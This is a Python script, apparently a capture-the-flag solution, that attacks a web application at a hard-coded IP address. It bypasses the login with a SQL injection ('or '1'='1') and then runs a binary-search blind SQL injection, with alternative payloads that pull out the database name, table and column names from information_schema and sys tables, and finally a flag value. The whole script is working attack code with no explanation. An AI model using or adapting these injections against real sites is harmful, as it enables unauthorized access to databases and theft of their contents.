import requests
import sys
import io

import urllib
import http.cookiejar as ckj
lg = {'username':"' or '1'='1",'password':'123'}
url = 'http://150.158.27.164:81/start/login.php'
cj = ckj.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
lgdata = urllib.parse.urlencode(lg).encode("utf-8")
opener.open(url,lgdata)
res = opener.open(url)
print(res.read())




url1="http://150.158.27.164:81/start/post.php"
url2="http://150.158.27.164:81/start/article.php"
name=''

for i in range(1,50):
    print(i)
    low=32
    high=128
    mid=(low+high)//2
    while low<high:
        payload = "'/**/or/**/(ascii(substr((select(database())),%d,1))>%d)^'0" % (i, mid)
        #payload = "0^(ascii(substr((select(database())),%d,1))>%d)" % (i, mid)
        #payload = "0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='give_grandpa_pa_pa_pa')),%d,1))>%d)"%(i,mid)
        #payload = "0^(ascii(substr((select(group_concat(table_name))from(sys.x$schema_table_statistics_with_buffer)where(table_schema=database())),%d,1))>%d)"%(i,mid)
        #payload = "0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='f1ag_1s_h3r3_hhhhh')),%d,1))>%d)"%(i,mid)
        #payload = "0^(ascii(substr((select(group_concat(value))from(flag)),%d,1))>%d)"%(i,mid)
        data = {
            "title" : 'qiyeqiye',
            "content" : payload
        }
        r1 = requests.post(url1,data=data)
        print(payload)
        r2 = requests.post(url1)
        if 'qiyeqiye' in r2.text:
            low = mid+1
        else:
            high=mid
        mid=(low+high)//2
        if(mid==32):
            break
    name=name+chr(mid)
    print (name)

